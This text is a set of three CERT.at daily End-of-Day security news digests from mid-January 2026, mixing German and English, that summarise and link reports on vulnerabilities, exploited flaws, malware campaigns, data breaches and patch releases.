=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 15-01-2026 18:00 − Freitag 16-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Per Bitflip zum Root-Zugriff: Lücke in AMD-CPUs ermöglicht Einbruch in Cloud-VMs ∗∗∗
---------------------------------------------
Eine neue Angriffstechnik namens Stackwarp lässt Angreifer über AMD-CPUs virtuelle Maschinen kapern. Vor allem Cloud-Umgebungen sind gefährdet.
---------------------------------------------
https://www.golem.de/news/per-bitflip-zum-root-zugriff-luecke-in-amd-cpus-e…
∗∗∗ AWS CodeBuild Misconfiguration Exposed GitHub Repos to Potential Supply Chain Attacks ∗∗∗
---------------------------------------------
A critical misconfiguration in Amazon Web Services (AWS) CodeBuild could have allowed complete takeover of the cloud service providers own GitHub repositories, including its AWS JavaScript SDK, putting every AWS environment at risk.
---------------------------------------------
https://thehackernews.com/2026/01/aws-codebuild-misconfiguration-exposed.ht…
∗∗∗ Five Malicious Chrome Extensions Impersonate Workday and NetSuite to Hijack Accounts ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered five new malicious Google Chrome web browser extensions that masquerade as human resources (HR) and enterprise resource planning (ERP) platforms like Workday, NetSuite, and SuccessFactors to take control of victim accounts.
---------------------------------------------
https://thehackernews.com/2026/01/five-malicious-chrome-extensions.html
∗∗∗ Chinese spies used Maduros capture as a lure to phish US govt agencies ∗∗∗
---------------------------------------------
Whats next for Venezuela? Click on the file and see What policy wonk wouldnt want to click on an attachment promising to unveil US plans for Venezuela? Chinese cyberspies used just such a lure to target US government agencies and policy-related organizations in a phishing campaign that began just days after an American military operation captured Venezuelan President Nicolás Maduro.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2026/01/15/chinese_spie…
∗∗∗ Bankrupt scooter startup left one private key to rule them all ∗∗∗
---------------------------------------------
An Estonian e-scooter owner locked out of his own ride after the manufacturer went bust did what any determined engineer might do. He reverse-engineered it, and claims he ended up discovering the master key that unlocks every scooter the company ever sold.
---------------------------------------------
https://www.theregister.com/2026/01/16/bankrupt_scooter_startup_key/
∗∗∗ RondoDox botnet linked to large-scale exploit of critical HPE OneView bug ∗∗∗
---------------------------------------------
Check Point observes 40K+ attack attempts in our hours, with government organizations under fire A critical HPE OneView flaw is now being exploited at scale, with Check Point tying mass, automated attacks to the RondoDox botnet.
---------------------------------------------
https://www.theregister.com/2026/01/16/rondodox_botnet_hpe_oneview/
∗∗∗ German cops add Black Basta boss to EU most-wanted list ∗∗∗
---------------------------------------------
Ransomware kingpin who escaped Armenian custody is believed to be lying low back home German cops have added Russian national Oleg Evgenievich Nefekov to their list of most-wanted criminals for his services to ransomware.
---------------------------------------------
https://www.theregister.com/2026/01/16/black_basta_boss_wanted/
∗∗∗ Jetzt patchen! Kritische Cisco-Lücke seit Dezember 2025 ausgenutzt ∗∗∗
---------------------------------------------
Angreifer kompromittieren Cisco Secure Email Gateway und Secure Email und Web Manager über eine Root-Schwachstelle. Nun gibt es Sicherheitsupdates.
---------------------------------------------
https://www.heise.de/news/Jetzt-patchen-Kritische-Cisco-Luecke-seit-Dezembe…
∗∗∗ Die lernende Bedrohung: Predator-Spyware ist raffinierter als gedacht ∗∗∗
---------------------------------------------
Die Spähsoftware Predator von Intellexa gewinnt selbst aus gescheiterten Infektionsversuchen wertvolle Daten und macht gezielt Jagd auf IT-Sicherheitsforscher.
---------------------------------------------
https://www.heise.de/news/Die-lernende-Bedrohung-Predator-Spyware-ist-raffi…
∗∗∗ Chinese hackers targeting ‘high value’ North American critical infrastructure, Cisco says ∗∗∗
---------------------------------------------
Chinese hackers successfully breached multiple critical infrastructure organizations in North America over the last year using a combination of compromised credentials and exploitable servers, researchers at Cisco Talos found.
---------------------------------------------
https://therecord.media/china-hackers-apt-cisco-talos
∗∗∗ Canadian investment regulator confirms hackers hit 750,000 investors ∗∗∗
---------------------------------------------
The nongovernmental Canadian Investment Regulatory Organization, which oversees the countrys debt and equity marketplaces as well as some financial institutions, released details about an August 2025 data breach.
---------------------------------------------
https://therecord.media/canada-ciro-investing-regulator-confirms-data-breach
∗∗∗ CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation ∗∗∗
---------------------------------------------
CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake proof-of-concept exploits, scanners, exploits, and widespread misconceptions, this technical analysis intends to cut through the noise.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-…
∗∗∗ New PayPal Scam Sends Verified Invoices With Fake Support Numbers ∗∗∗
---------------------------------------------
Scammers are using verified PayPal invoices to launch callback phishing attacks. Learn how the "Alexzander" invoice bypasses Google filters.
---------------------------------------------
https://hackread.com/paypal-scam-verified-invoices-fake-support-numbers/
∗∗∗ Operation Endgame: Dutch Police Arrest Alleged AVCheck Operator ∗∗∗
---------------------------------------------
Dutch police arrest the alleged AVCheck operator at Schiphol as part of Operation Endgame, a global effort targeting malware services and cybercrime.
---------------------------------------------
https://hackread.com/operation-endgame-dutch-police-arrest-avcheck-operator/
∗∗∗ Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation ∗∗∗
---------------------------------------------
Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dating back to 1999—Mandiant consultants continue to identify its use in active environments.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-depreca…
∗∗∗ Das Meldeportal in der AWS-Cloud: Warum nur, BSI? ∗∗∗
---------------------------------------------
Schön, dass das BSI ein neues Portal für IT-Sicherheit bietet. Aber muss das unbedingt über die AWS-Cloud laufen, fragt sich Tobias Glemser.
---------------------------------------------
https://heise.de/-11142071
∗∗∗ How to Use Pareto Principle to Fine-Tune Alerts and Reduce False Positives Wisely ∗∗∗
---------------------------------------------
False positives were not only consuming analyst time — they were also diluting attention and slowing response on the few alerts that actually mattered.
---------------------------------------------
https://detect.fyi/how-to-use-pareto-principle-to-fine-tune-alerts-and-redu…
=====================
= Vulnerabilities =
=====================
∗∗∗ Hackers exploit Modular DS WordPress plugin flaw for admin access ∗∗∗
---------------------------------------------
Hackers are actively exploiting a maximum severity flaw in the Modular DS WordPress plugin that allows them to bypass authentication remotely and access the vulnerable sites with admin-level privileges.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-exploit-modular-ds-w…
∗∗∗ Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices ∗∗∗
---------------------------------------------
A critical vulnerability in Googles Fast Pair protocol can allow attackers to hijack Bluetooth audio accessories like wireless headphones and earbuds, track users, and eavesdrop on their conversations.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-whisperpair-flaw-le…
∗∗∗ VU#383552: thelibrarian does not secure its interface, allowing for access to internal system data ∗∗∗
---------------------------------------------
Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io. The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Drive, and also summarize meetings and schedule emails.
---------------------------------------------
https://kb.cert.org/vuls/id/383552
∗∗∗ VU#650657: Livewire Filemanager contains an insecure .php component that allows for unauthenticated RCE in Laravel Products ∗∗∗
---------------------------------------------
A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows for users to upload various files, including PHP files, and host them within the Laravel application.
---------------------------------------------
https://kb.cert.org/vuls/id/650657
∗∗∗ Juniper Networks: Zahlreiche Sicherheitsupdates für diverse Produkte ∗∗∗
---------------------------------------------
Juniper Networks hat Sicherheitsaktualisierungen für zahlreiche Produkte veröffentlicht. IT-Admins sollten sie rasch anwenden.
---------------------------------------------
https://www.heise.de/news/Juniper-Networks-Zahlreiche-Sicherheitsupdates-fu…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gnupg2), Debian (firefox-esr), Oracle (cups, gnupg2, libpq, net-snmp, postgresql, postgresql:15, postgresql:16, transfig, and vsftpd), Red Hat (firefox), SUSE (apache2, curl, firefox, gpg2, hawk2, libcryptopp-devel, openCryptoki, python310, python311-urllib3, rke2, squid, and tomcat), and Ubuntu (cpp-httplib, git, python-apt, and simgear).
---------------------------------------------
https://lwn.net/Articles/1054683/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 14-01-2026 18:00 − Donnerstag 15-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Exploit code public for critical FortiSIEM command injection flaw ∗∗∗
---------------------------------------------
Technical details and a public exploit have been published for a critical vulnerability affecting Fortinets Security Information and Event Management (SIEM) solution that could be leveraged by a remote, unauthenticated attacker to execute commands or code.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/exploit-code-public-for-crit…
∗∗∗ Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices ∗∗∗
---------------------------------------------
A critical vulnerability in Googles Fast Pair protocol can allow attackers to hijack Bluetooth audio accessories like wireless headphones and earbuds, track users, and eavesdrop on their conversations.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-flaw-lets-hackers-t…
∗∗∗ Most Severe AI Vulnerability to Date Hits ServiceNow ∗∗∗
---------------------------------------------
The ITSM giant tacked agentic AI onto a largely unguarded legacy chatbot, exposing customers data and connected systems.
---------------------------------------------
https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow
∗∗∗ Januar-Patchday: Windows-Updates machen Remote-Anmeldung kaputt ∗∗∗
---------------------------------------------
Einige Anwender haben neuerdings Probleme, sich mit der Windows-App bei Azure Virtual Desktop oder Windows 365 anzumelden. Ein Fix ist in Arbeit.
---------------------------------------------
https://www.golem.de/news/januar-patchday-windows-updates-machen-windows-ap…
∗∗∗ Ransomware-Boss gesucht: Dieser Mann soll der Anführer von Black Basta sein ∗∗∗
---------------------------------------------
Interpol, Europol und das BKA fahnden nach dem Boss der Ransomware-Gruppe Black Basta, die allein in Deutschland über 100 Organisationen geschädigt hat.
---------------------------------------------
https://www.golem.de/news/ransomware-boss-gesucht-dieser-mann-soll-der-anfu…
∗∗∗ A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby ∗∗∗
---------------------------------------------
Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription.
---------------------------------------------
https://projectzero.google/2026/01/pixel-0-click-part-1.html
∗∗∗ A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave ∗∗∗
---------------------------------------------
With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context.
---------------------------------------------
https://projectzero.google/2026/01/pixel-0-click-part-2.html
∗∗∗ A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here? ∗∗∗
---------------------------------------------
While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement.
---------------------------------------------
https://projectzero.google/2026/01/pixel-0-click-part-3.html
∗∗∗ Researchers Null-Route Over 550 Kimwolf and Aisuru Botnet Command Servers ∗∗∗
---------------------------------------------
The Black Lotus Labs team at Lumen Technologies said it null-routed traffic to more than 550 command-and-control (C2) nodes associated with the AISURU/Kimwolf botnet since early October 2025.
---------------------------------------------
https://thehackernews.com/2026/01/kimwolf-botnet-infected-over-2-million.ht…
∗∗∗ Verizon Outage Knocks Out US Mobile Service, Including Some 911 Calls ∗∗∗
---------------------------------------------
A major Verizon outage appeared to impact customers across the United States starting around noon ET on Wednesday. Calls to Verizon customers from other carriers may also be impacted.
---------------------------------------------
https://www.wired.com/story/verizon-outage-knocks-out-us-mobile-service-inc…
∗∗∗ Razzia in Deutschland: Behörden machen Cybercrime-Hoster RedVDS dicht ∗∗∗
---------------------------------------------
Internationalen Ermittlern und Microsoft ist ein Schlag gegen die Infrastruktur des Cybercrime-Hosters RedVDS gelungen. Die Server standen auch in Deutschland.
---------------------------------------------
https://www.heise.de/news/Razzia-in-Deutschland-Behoerden-machen-Cybercrime…
∗∗∗ Chrome: Google kappt Support für älteres macOS ∗∗∗
---------------------------------------------
Das vor weniger als fünf Jahren erschienene macOS 12 alias Monterey ist bei Googles Browser bald raus. Sicherheitslücken bleiben bestehen.
---------------------------------------------
https://www.heise.de/news/Chrome-Google-kappt-Support-fuer-aelteres-macOS-1…
∗∗∗ curl: Projekt beendet Bug-Bounty-Programm ∗∗∗
---------------------------------------------
curl-Maintainer Daniel Stenberg hat das Ende des Bug-Bounty-Programms angekündigt. Unbrauchbare KI-Meldungen nahmen wohl überhand.
---------------------------------------------
https://www.heise.de/news/curl-Projekt-beendet-Bug-Bounty-Programm-11142345…
∗∗∗ Kriminelle imitieren Banknummern: Vorsicht vor Spoofing ∗∗∗
---------------------------------------------
Kriminelle suchen ständig nach neuen Methoden, um an Kontodaten zu gelangen. Leider sind sie fündig geworden: Mit Spoofing täuschen sie die Nummer von Banken vor und erschleichen so das Vertrauen ihrer Opfer.
---------------------------------------------
https://www.watchlist-internet.at/news/kriminelle-imitieren-banknummern-spo…
∗∗∗ Microsoft disrupts RedVDS cybercrime platform behind $40 million in scam losses ∗∗∗
---------------------------------------------
Microsoft and law enforcement partners took down a popular cybercriminal subscription service called RedVDS that was used to enable more than $40 million in fraud losses in the United States alone.
---------------------------------------------
https://therecord.media/microsoft-redvds-cybercrime-scam
∗∗∗ UAT-8837 targets critical infrastructure sectors in North America ∗∗∗
---------------------------------------------
Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.
---------------------------------------------
https://blog.talosintelligence.com/uat-8837/
∗∗∗ GhostPoster Browser Malware Hid for 5 Years With 840,000 Installs ∗∗∗
---------------------------------------------
Researchers uncover a 5-year malware campaign using browser extensions on Chrome, Firefox and Edge, relying on hidden payloads and shared infrastructure.
---------------------------------------------
https://hackread.com/ghostposter-browser-malware-840000-installs/
∗∗∗ Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation ∗∗∗
---------------------------------------------
Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dating back to 1999—Mandiant consultants continue to identify its use in active environments.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-depreca…
∗∗∗ New Remcos Campaign Distributed Through Fake Shipping Document ∗∗∗
---------------------------------------------
FortiGuard Labs discovered a new phishing campaign in the wild. The campaign delivers a new variant of Remcos, a commercial lightweight remote access tool (RAT) with a wide range of capabilities, including system resource management, remote surveillance, network management, and Remcos agent management.
---------------------------------------------
https://feeds.fortinet.com/~/940295429/0/fortinet/blogs~New-Remcos-Campaign…
∗∗∗ I’m The Captain Now: Hijacking a global ocean supply chain network ∗∗∗
---------------------------------------------
There’s a good chance you have never heard of BLUVOYIX or Bluspark Global, and that’s ok! Not every company that powers global commerce is a household name. Despite their low profile, companies like these have an important role to play in keeping the global supply chain running in the background. Breaches at companies you haven’t heard of can often have the worst impacts.
---------------------------------------------
https://eaton-works.com/2026/01/14/bluspark-bluvoyix-hack/
∗∗∗ Malicious Chrome Extension Steals MEXC API Keys for Account Takeover ∗∗∗
---------------------------------------------
A malicious Chrome extension steals newly created MEXC API keys, exfiltrates them to Telegram, and enables full account takeover with trading and withdrawal rights.
---------------------------------------------
https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical WordPress Modular DS Plugin Flaw Actively Exploited to Gain Admin Access ∗∗∗
---------------------------------------------
A maximum-severity security flaw in a WordPress plugin called Modular DS has come under active exploitation in the wild, according to Patchstack. The vulnerability, tracked as CVE-2026-23550 (CVSS score: 10.0), has been described as a case of unauthenticated privilege escalation impacting all versions of the plugin prior to and including 2.5.1. It has been patched in version 2.5.2.
---------------------------------------------
https://thehackernews.com/2026/01/critical-wordpress-modular-ds-plugin.html
∗∗∗ Role Delegation - Moderately critical - Access bypass - SA-CONTRIB-2026-002 ∗∗∗
---------------------------------------------
This module allows site administrators to grant specific roles the authority to assign selected roles to users, without them needing the "administer permissions" permission. The module contains an access bypass vulnerability when used in combination with the Views Bulk Operations module. A user with the ability to delegate a role is also able to assign the administrator role, including to their own user.
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-002
∗∗∗ Group invite - Moderately critical - Access bypass - SA-CONTRIB-2026-001 ∗∗∗
---------------------------------------------
This module enables allows group managers to invite people into their group. The module doesn't sufficiently check access under certain circumstances, allowing unauthorized users to access the group's content.
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-001
∗∗∗ Microsoft Entra ID SSO Login - Critical - Access bypass - SA-CONTRIB-2026-005 ∗∗∗
---------------------------------------------
This module enables Drupal sites to authenticate users via Microsoft Entra ID (formerly Azure AD) using OAuth 2.0. The module doesn't sufficiently validate API responses from Microsoft allowing complete account takeover of any user, including site administrators, without requiring any credentials or access to the target's email account.
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-005
∗∗∗ Fortinet: Heap-based buffer overflow in cw_acd daemon (FortiOS, FortiSASE, FortiSwitchManager) ∗∗∗
---------------------------------------------
A heap-based buffer overflow vulnerability [CWE-122] in FortiOS and FortiSwitchManager cw_acd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. CVE-2025-25249 / CVSSv3 Score 7.4
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-25-084
∗∗∗ Angreifer können Palo-Alto-Firewalls in Wartungsmodus zwingen ∗∗∗
---------------------------------------------
Unter bestimmten Bedingungen können Angreifer an einer Sicherheitslücke in PAN-OS ansetzen und so Firewalls von Palo Alto Networks attackieren. Bislang gibt es dem IT-Sicherheitsunternehmen zufolge keine Hinweise auf Attacken.
---------------------------------------------
https://www.heise.de/news/Angreifer-koennen-Palo-Alto-Firewalls-in-Wartungs…
∗∗∗ CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal (Severity: HIGH) ∗∗∗
---------------------------------------------
A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode.
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2026-0227
∗∗∗ Security Vulnerabilities fixed in Thunderbird 140.7 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-05/
∗∗∗ Security Vulnerabilities fixed in Thunderbird 147 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-04/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 13-01-2026 18:00 − Mittwoch 14-01-2026 18:30
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Target employees confirm leaked source code is authentic ∗∗∗
---------------------------------------------
Multiple current and former Target employees confirmed that leaked source code samples posted by a threat actor match real internal systems. The company also rolled out an "accelerated" lockdown of its Git server, requiring VPN access, a day after being contacted by BleepingComputer.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/target-employees-confirm-lea…
∗∗∗ Microsoft: Windows 365 update blocks access to Cloud PC sessions ∗∗∗
---------------------------------------------
Microsoft confirmed that a recent Windows 365 update is blocking customers from accessing their Microsoft 365 Cloud PC sessions.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-365-updat…
∗∗∗ Cloud marketplace Pax8 accidentally exposes data on 1,800 MSP partners ∗∗∗
---------------------------------------------
Cloud marketplace and distributor Pax8 has confirmed that it mistakenly sent an email to fewer than 40 UK-based partners containing a spreadsheet with internal business information, including MSP customer and Microsoft licensing data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cloud-marketplace-pax8-accid…
∗∗∗ Reprompt attack let hackers hijack Microsoft Copilot sessions ∗∗∗
---------------------------------------------
Researchers identified an attack method dubbed "Reprompt" that could allow attackers to infiltrate a users Microsoft Copilot session and issue commands to exfiltrate sensitive data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/reprompt-attack-let-hackers-…
∗∗∗ ConsentFix debrief: Insights from the new OAuth phishing attack ∗∗∗
---------------------------------------------
ConsentFix is an OAuth phishing technique abusing browser-based authorization flows to hijack Microsoft accounts. Push Security shares new insights from continued tracking, community research, and evolving attacker techniques.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/consentfix-debrief-insights-…
∗∗∗ Microsoft updates Windows DLL that triggered security alerts ∗∗∗
---------------------------------------------
Microsoft has resolved a known issue that was causing security applications to incorrectly flag a core Windows component, the company said in a service alert posted this week.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-updates-windows-d…
∗∗∗ Ohne Authentifizierung: Broadcom-Lücke lässt Angreifer ganze WLAN-Netze lahmlegen ∗∗∗
---------------------------------------------
Zahlreiche WLAN-Netze, die auf Broadcom-Chipsätzen basieren, lassen sich mit nur einem Datenpaket lahmlegen. Angreifer brauchen dafür keinen Schlüssel.
---------------------------------------------
https://www.golem.de/news/ohne-authentifizierung-broadcom-luecke-laesst-ang…
∗∗∗ Corrupting LLMs Through Weird Generalizations ∗∗∗
---------------------------------------------
Abstract LLMs are useful because they generalize so well. But can you have too much of a good thing? We show that a small amount of finetuning in narrow contexts can dramatically shift behavior outside those contexts.
---------------------------------------------
https://www.schneier.com/blog/archives/2026/01/corrupting-llms-through-weir…
∗∗∗ Malware Intercepts Googlebot via IP-Verified Conditional Logic ∗∗∗
---------------------------------------------
Some attackers are increasingly moving away from simple redirects in favor of more “selective” methods of payload delivery. This approach filters out regular human visitors, allowing attackers to serve malicious content to search engine crawlers while remaining invisible to the website owner.
---------------------------------------------
https://blog.sucuri.net/2026/01/malware-intercepts-googlebot-via-ip-verifie…
∗∗∗ Malicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of a malicious Google Chrome extension thats capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries, while masquerading as a tool to automate trading on the platform.
---------------------------------------------
https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.ht…
∗∗∗ New Research: 64% of 3rd-Party Applications Access Sensitive Data Without Justification ∗∗∗
---------------------------------------------
Research analyzing 4,700 leading websites reveals that 64% of third-party applications now access sensitive data without business justification, up from 51% in 2024. Government sector malicious activity spiked from 2% to 12.9%, while 1 in 7 Education sites show active compromise.
---------------------------------------------
https://thehackernews.com/2026/01/new-research-64-of-3rd-party.html
∗∗∗ Hackers Exploit c-ares DLL Side-Loading to Bypass Security and Deploy Malware ∗∗∗
---------------------------------------------
Security experts have disclosed details of an active malware campaign thats exploiting a DLL side-loading vulnerability in a legitimate binary associated with the open-source c-ares library to bypass security controls and deliver a wide range of commodity trojans and stealers.
---------------------------------------------
https://thehackernews.com/2026/01/hackers-exploit-c-ares-dll-side-loading.h…
∗∗∗ Interrail meldet Datenleck: Auch Ausweisdaten betroffen ∗∗∗
---------------------------------------------
Bei Eurail flossen mutmaßlich Daten ab. Der Anbieter stellt Interrail-Pässe auch im Auftrag der deutschen, österreichischen und Schweizer Bahn aus.
---------------------------------------------
https://www.heise.de/news/Interrail-meldet-Datenleck-Auch-Ausweisdaten-betr…
∗∗∗ Kritik an GnuPG und seinem Umgang mit gemeldeten Lücken ∗∗∗
---------------------------------------------
Die auf dem 39C3 demonstrierten Probleme in der PGP-Implementierung GnuPG riefen vielfältige Kritik an GnuPGs Umgang damit, aber auch an PGP insgesamt hervor.
---------------------------------------------
https://www.heise.de/hintergrund/Kritik-an-GnuPG-und-seinem-Umgang-mit-geme…
∗∗∗ Malware-Masche: Jobangebote jubeln Entwicklern bösartige Repositories unter ∗∗∗
---------------------------------------------
Entwickler müssen bei Jobangeboten inzwischen aufpassen. Kriminelle versuchen, Infostealer darüber zu verteilen.
---------------------------------------------
https://www.heise.de/news/Malware-Masche-Jobangebote-jubeln-Entwicklern-boe…
∗∗∗ How real software downloads can hide remote backdoors ∗∗∗
---------------------------------------------
Attackers use legitimate open-source software as cover, relying on user trust to compromise systems. We dive into an example.
---------------------------------------------
https://www.malwarebytes.com/blog/threat-intel/2026/01/how-real-software-do…
∗∗∗ Instagram dementiert Hack nach massenhaften Passwort-Reset-Mails ∗∗∗
---------------------------------------------
Zuvor waren Berichte über entwendete Daten von 17 Millionen Usern kursiert. Das Unternehmen widerspricht und rät zum Ignorieren der Mails
---------------------------------------------
https://www.derstandard.at/story/3000000303975/instagram-dementiert-hack-na…
∗∗∗ Ransomware: Tactical Evolution Fuels Extortion Epidemic ∗∗∗
---------------------------------------------
New whitepaper reveals record number of attacks as threat landscape evolves with new players and new tactics.
---------------------------------------------
https://www.security.com/threat-intelligence/ransomware-extortion-epidemic
∗∗∗ More than 40 countries impacted by North Korea IT worker scams, crypto thefts ∗∗∗
---------------------------------------------
Eleven countries led a session at the UN headquarters in New York centered around a 140-page report released last fall that covered North Korea’s extensive cyber-focused efforts to fund its nuclear and ballistic weapons program.
---------------------------------------------
https://therecord.media/40-countries-impacted-nk-it-thefts-united-nations
∗∗∗ Poland says it repelled major cyberattack on power grid, blames Russia ∗∗∗
---------------------------------------------
Poland narrowly avoided a large-scale power outage by thwarting what officials described as the most serious cyberattack on its energy infrastructure in years.
---------------------------------------------
https://therecord.media/poland-cyberattack-grid-russia
∗∗∗ Western cyber agencies warn about threats to industrial operational technology ∗∗∗
---------------------------------------------
New guidance issued by Britain’s National Cyber Secure Centre (NCSC), a part of signals and cyber intelligence agency GCHQ, sets out how organizations should securely connect equipment such as industrial control systems, sensors and other critical services.
---------------------------------------------
https://therecord.media/cyber-agencies-warn-of-industrial-system-threats
∗∗∗ Telegram to Add Warning for Proxy Links After IP Leak Concerns ∗∗∗
---------------------------------------------
Telegram will add a warning for proxy links after reports showed they can expose user IP addresses with a single click, bypassing VPN or privacy settings.
---------------------------------------------
https://hackread.com/telegram-add-warning-proxy-links-ip-leak/
∗∗∗ Hacker Claims Full Breach of Russia’s Max Messenger, Threatens Public Leak ∗∗∗
---------------------------------------------
A hacker claims a full breach of Russia’s Max Messenger, threatening to leak user data and backend systems if demands are not met.
---------------------------------------------
https://hackread.com/hacker-russia-max-messenger-breach-data-leak/
∗∗∗ Secure Connectivity Principles for Operational Technology (OT) ∗∗∗
---------------------------------------------
CISA and the UK National Cyber Security Centre (NCSC-UK), in collaboration with federal and international partners, have released Secure Connectivity Principles for Operational Technology (OT) guidance to help asset owners address increasing business and regulatory pressures for connectivity into operational technology (OT) networks.
---------------------------------------------
https://www.cisa.gov/resources-tools/resources/secure-connectivity-principl…
∗∗∗ Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554 ∗∗∗
---------------------------------------------
This blog is the first part of a mini-series looking at the four unpatchable CVEs in every Kubernetes cluster.
---------------------------------------------
https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerab…
∗∗∗ Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 ∗∗∗
---------------------------------------------
Despite the advancements that have been made in Wi-Fi security with the arrival of WPA3, some misconfigurations and legacy protocols still remain. In this blogpost, we share insights into Wi-Fi related findings encountered during penetration testing engagements.
---------------------------------------------
https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi…
=====================
= Vulnerabilities =
=====================
∗∗∗ Multiple vulnerabilities in EATON UPS Companion ∗∗∗
---------------------------------------------
EATON UPS Companion provided by Eaton contains multiple vulnerabilities.
---------------------------------------------
https://jvn.jp/en/jp/JVN48187396/
∗∗∗ Patchday Microsoft: Attacken auf Windows und Windows Server beobachtet ∗∗∗
---------------------------------------------
Es sind wichtige Sicherheitsupdates für Office, Windows & Co. erschienen. Angreifer nutzen bereits eine Lücke aus. Weitere Attacken können bevorstehen.
---------------------------------------------
https://www.heise.de/news/Patchday-Microsoft-Angreifer-spionieren-Speicherb…
∗∗∗ Patchday Adobe: Schadcode-Lücken bedrohen Dreamweaver & Co. ∗∗∗
---------------------------------------------
Wichtige Sicherheitsupdates reparieren unter anderem Adobe ColdFusion und InDesign.
---------------------------------------------
https://www.heise.de/news/Patchday-Adobe-Schadcode-Luecken-bedrohen-Dreamwe…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (sssd), Debian (linux-6.1 and python-parsl), Fedora (chezmoi, complyctl, composer, and firefox), Oracle (kernel), Red Hat (buildah, libpq, podman, postgresql, postgresql16, postgresql:13, postgresql:15, and postgresql:16), SUSE (avahi, curl, ffmpeg-4, ffmpeg-7, firefox, istioctl, k6, kubelogin, libmicrohttpd, libpcap-devel, libpng16, libtasn1-6-32bit, matio, ovmf, python-tornado6, python311-Authlib, and teleport), and Ubuntu (angular.js, python-urllib3, and webkit2gtk).
---------------------------------------------
https://lwn.net/Articles/1054167/
∗∗∗ Mitigating Denial-of-Service Vulnerability from Unrecoverable Stack Space Exhaustion for React, Next.js, and APM Users ∗∗∗
---------------------------------------------
